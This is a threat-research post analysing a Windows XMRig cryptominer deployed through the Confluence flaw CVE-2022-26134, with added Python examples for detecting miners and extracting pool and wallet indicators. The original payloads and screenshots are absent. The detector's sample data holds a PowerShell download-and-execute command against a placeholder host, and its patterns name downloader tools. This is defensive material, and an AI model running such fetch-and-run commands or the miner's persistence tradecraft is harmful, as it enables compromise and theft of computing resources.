Threat Spotlight: In-depth look at a cryptominer attack exploiting the Confluence bug
In this continuation of our research on attacks attempting to exploit a zero-day in Atlassian Confluence, CVE-2022-26134, we take a deeper look at one of the cryptominers seen in the attack payloads.
The original attack payload is:
It decodes to:
The PowerShell part of this command shows that this payload is specifically targeted at Windows systems. Decoding the embedded base64 string further leads us to:
We were able to download wi.txt and the config and other files linked within it, and a detailed analysis follows.
Detailed analysis of XMRig cryptominer
The first section of wi.txt is shown in the screenshot below:
At the start, we see a PowerShell command similar to the payload with a base64-encoded string, and a scheduled task with a Pastebin URL.
The base64 string decodes to a PowerShell download-and-IEX statement, which contains a Pastebin URL. Neither Pastebin URL has any content: no commands are fetched or executed from them. Our understanding is that they are accessed as a keepalive of sorts, so that the paste view counts show how often “wi.txt” is executed (wi.txt being the filename of the original payload). Judging by the paste names, “wi_wmi” and “wi_sch”, each serves a specific purpose: the first is hit once the WMI commands have executed successfully, and the second each time the scheduled task fires. These counts act as the attacker’s indicator of how many systems have been infected successfully.
This is followed by a comprehensive removal of competitors. The function named “Killer” uses several methods to identify and terminate any competing miners running on the system. It looks for miners based on:
- Known service names
- Known process names
- Known scheduled tasks used by other miners
- Command-line arguments of running processes that match other miners
- Open network connections, enumerated with netstat, to spot miners by where they connect
In short, it takes a very thorough look at the system and removes any competition, so that the attacker’s own mining gets the maximum available resources.
After this, there is a section where the script cleans up some other Windows processes. One interesting detail here is the removal of a miner that has been set up to run persistently through the Windows registry:
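The five checks in the “Killer” function and the registry clean-up above are exactly the checks a defender can run to find this miner, or the ones it displaced. The script below is an added example, not code from the original post or from the payload: it applies those heuristics (known image and service names, miner-style command-line arguments, task actions and Run-key values that download or mine, and netstat connections to typical stratum ports cross-referenced by PID) to constructed snapshots of what tasklist /v, sc query, schtasks /query /v, reg query on the CurrentVersion\Run keys and netstat -ano would return on a Windows host. All process names, paths, task names, hosts, ports and the WALLET_PLACEHOLDER string are made up for the example, and the “known” name lists and the port list are illustrative heuristics rather than a complete signature set.

```python
import re

# --- constructed sample snapshots (not from the page) ----------------------
PROCESSES = [  # (pid, image, command line), as from tasklist /v or Win32_Process
    (1204, "svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    (3320, "sysupdate.exe", r"C:\ProgramData\sysupdate.exe -o stratum+tcp://pool.example:3333 -u WALLET_PLACEHOLDER -p x --donate-level 1"),
    (4410, "notepad.exe", "notepad.exe"),
    (5120, "svchost.exe", r"C:\Users\Public\svchost.exe --algo rx/0 --url=pool2.example:14444"),
]
SERVICES = ["wuauserv", "xmrig", "Spooler"]                       # service names from sc query
TASKS = [  # (task name, action) from schtasks /query /v
    ("wi_sch", "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.example/raw/PLACEHOLDER')\""),
    (r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan", r"%systemroot%\system32\usoclient.exe StartScan"),
]
RUN_VALUES = [  # (value name, data) under ...\CurrentVersion\Run
    ("Updater", r"C:\ProgramData\sysupdate.exe -o stratum+tcp://pool.example:3333 -u WALLET_PLACEHOLDER -p x"),
    ("OneDrive", r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]
NETSTAT = [  # netstat -ano lines: proto, local, remote, state, pid
    "  TCP    10.0.0.5:49812    203.0.113.7:3333     ESTABLISHED     3320",
    "  TCP    10.0.0.5:49900    203.0.113.9:443      ESTABLISHED     1204",
    "  TCP    10.0.0.5:50011    198.51.100.2:14444   ESTABLISHED     5120",
]

# --- the heuristics (illustrative lists, not a complete signature set) -----
KNOWN_MINER_IMAGES = {"xmrig.exe", "minerd.exe", "cpuminer.exe", "nheqminer.exe"}
KNOWN_MINER_SERVICES = {"xmrig", "minerd"}
MINER_ARGS = re.compile(
    r"stratum\+(?:tcp|ssl)://|--donate-level|--algo[= ]|--url[= ]|\s-o\s+\S+:\d+|cryptonight|rx/0", re.I)
DOWNLOADER = re.compile(r"DownloadString|Invoke-WebRequest|bitsadmin|certutil", re.I)
POOL_PORTS = {3333, 4444, 5555, 7777, 14444, 14433, 45700}      # common stratum ports
NETSTAT_LINE = re.compile(r"^\s*TCP\s+\S+\s+(\S+):(\d+)\s+\S+\s+(\d+)\s*$")


def pool_connections(netstat_lines):
    """Map PID -> [(remote host, remote port)] for connections on typical pool ports."""
    by_pid = {}
    for line in netstat_lines:
        m = NETSTAT_LINE.match(line)
        if not m:
            continue
        host, port, pid = m.group(1), int(m.group(2)), int(m.group(3))
        if port in POOL_PORTS:
            by_pid.setdefault(pid, []).append((host, port))
    return by_pid


def find_miners(processes, services, tasks, run_values, netstat_lines):
    """Apply the Killer-style heuristics; returns [{'kind', 'id', 'reasons'}, ...]."""
    findings = []
    conns = pool_connections(netstat_lines)
    for pid, image, cmdline in processes:
        reasons = []
        if image.lower() in KNOWN_MINER_IMAGES:
            reasons.append("known miner image name")
        if MINER_ARGS.search(cmdline):
            reasons.append("miner-style command-line arguments")
        for host, port in conns.get(pid, []):
            reasons.append(f"connection to pool port {port} at {host}")
        if reasons:
            findings.append({"kind": "process", "id": f"{pid}:{image}", "reasons": reasons})
    for name in services:
        if name.lower() in KNOWN_MINER_SERVICES:
            findings.append({"kind": "service", "id": name, "reasons": ["known miner service name"]})
    for name, action in tasks:
        if MINER_ARGS.search(action) or DOWNLOADER.search(action):
            findings.append({"kind": "task", "id": name, "reasons": ["task action downloads or mines"]})
    for name, data in run_values:
        if MINER_ARGS.search(data) or DOWNLOADER.search(data):
            findings.append({"kind": "run-key", "id": name, "reasons": ["Run value starts a miner or downloader"]})
    return findings


def flagged_ids(findings):
    """Convenience view: the set of (kind, id) pairs that were flagged."""
    return {(f["kind"], f["id"]) for f in findings}


if __name__ == "__main__":
    for f in find_miners(PROCESSES, SERVICES, TASKS, RUN_VALUES, NETSTAT):
        print(f["kind"], f["id"], "->", "; ".join(f["reasons"]))
```

Note that the process named svchost.exe running from C:\Users\Public is caught by its arguments and its pool connection, not by its name: the name checks are the weakest of the five, which is why the miner's own Killer function does not rely on them alone either.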
This is followed by the final section, which runs the cleanup script (clean.bat) for competitor removal and sets up the new miner:
This is the actual execution block of the script; here you can see the download of the XMRig mining executable and its accompanying configuration file.
The configuration file sets up the miner, and in it you can see the mining pool, the username (for XMRig pools this is normally the attacker’s wallet address) and the password:
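The pool address and the wallet in that configuration are the most durable indicators in the whole chain: the download host can change, but the attacker has to keep pointing miners at a pool they control with a wallet they own. The parser below is an added example, not code from the original post or from the payload, for pulling those fields out of an XMRig-style config.json. The embedded config is constructed for the example: pool.example and backup.example are placeholders, the first "user" is a plain placeholder, and the second merely has the 95-character base58 shape of a standard Monero address so that the shape check has something to match.

```python
import json
import re

# Constructed XMRig-style config.json (not the file from the page). XMRig reads
# "pools" as a list of {url, user, pass, ...}; "donate-level" and "cpu" are
# top-level settings.
SAMPLE_CONFIG = r"""
{
  "autosave": true,
  "cpu": { "enabled": true, "max-threads-hint": 100 },
  "donate-level": 1,
  "pools": [
    { "url": "pool.example:3333", "user": "WALLET_PLACEHOLDER", "pass": "x", "keepalive": true, "tls": false },
    { "url": "stratum+ssl://backup.example:14433", "user": "__SHAPED_WALLET__", "pass": "worker1", "tls": true }
  ]
}
""".replace("__SHAPED_WALLET__", "4" + "A" * 94)   # dummy with a wallet-shaped value

BASE58 = re.compile(r"^[1-9A-HJ-NP-Za-km-z]+$")


def looks_like_monero_address(s: str) -> bool:
    """Shape check only: standard Monero addresses are 95 base58 characters
    starting with '4' (subaddresses start with '8'). Not a checksum validation."""
    return len(s) == 95 and s[0] in "48" and bool(BASE58.match(s))


def parse_pool_url(url: str):
    """XMRig accepts 'host:port' or 'stratum+tcp://host:port' / 'stratum+ssl://host:port'.
    Hostnames and IPv4 only; bracketed IPv6 literals are not handled here."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        scheme, rest = "", url
    host, _, port = rest.rpartition(":")
    return scheme, host, int(port) if port.isdigit() else None


def extract_pool_iocs(config_text: str) -> list:
    """One record per pool: where the miner connects and which wallet it credits."""
    cfg = json.loads(config_text)
    iocs = []
    for pool in cfg.get("pools", []):
        scheme, host, port = parse_pool_url(pool["url"])
        user = pool.get("user", "")
        iocs.append({
            "host": host,
            "port": port,
            "tls": bool(pool.get("tls")) or scheme == "stratum+ssl",
            "user": user,
            "pass": pool.get("pass", ""),
            "user_is_wallet_shaped": looks_like_monero_address(user),
        })
    return iocs


def miner_settings(config_text: str) -> dict:
    """The settings that decide how hard the miner hits the host."""
    cfg = json.loads(config_text)
    cpu = cfg.get("cpu", {})
    return {
        "donate_level": cfg.get("donate-level"),
        "cpu_enabled": cpu.get("enabled", True),
        "max_threads_hint": cpu.get("max-threads-hint"),
    }


if __name__ == "__main__":
    for ioc in extract_pool_iocs(SAMPLE_CONFIG):
        print(ioc)
    print(miner_settings(SAMPLE_CONFIG))
```

The host:port pairs are what to block at the egress firewall or DNS, and the wallet string is what to search for in other captured configs and process command lines, since the same wallet turning up elsewhere ties separate infections to one operator.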
This block does a number of things, including making sure the cleanup completes properly, with defined error conditions, and checking that the miner is actually running.
In all, this IP address has been serving this miner for quite some time and has not been taken down so far. It is an interesting look at a well-thought-out, well-written miner that makes sure it gets the maximum resources on the infected system and persists for the attacker’s profit. While we have seen this payload deployed against the Atlassian vulnerability, it is quite likely that the same payload has been, and will be, used against other vulnerabilities as well.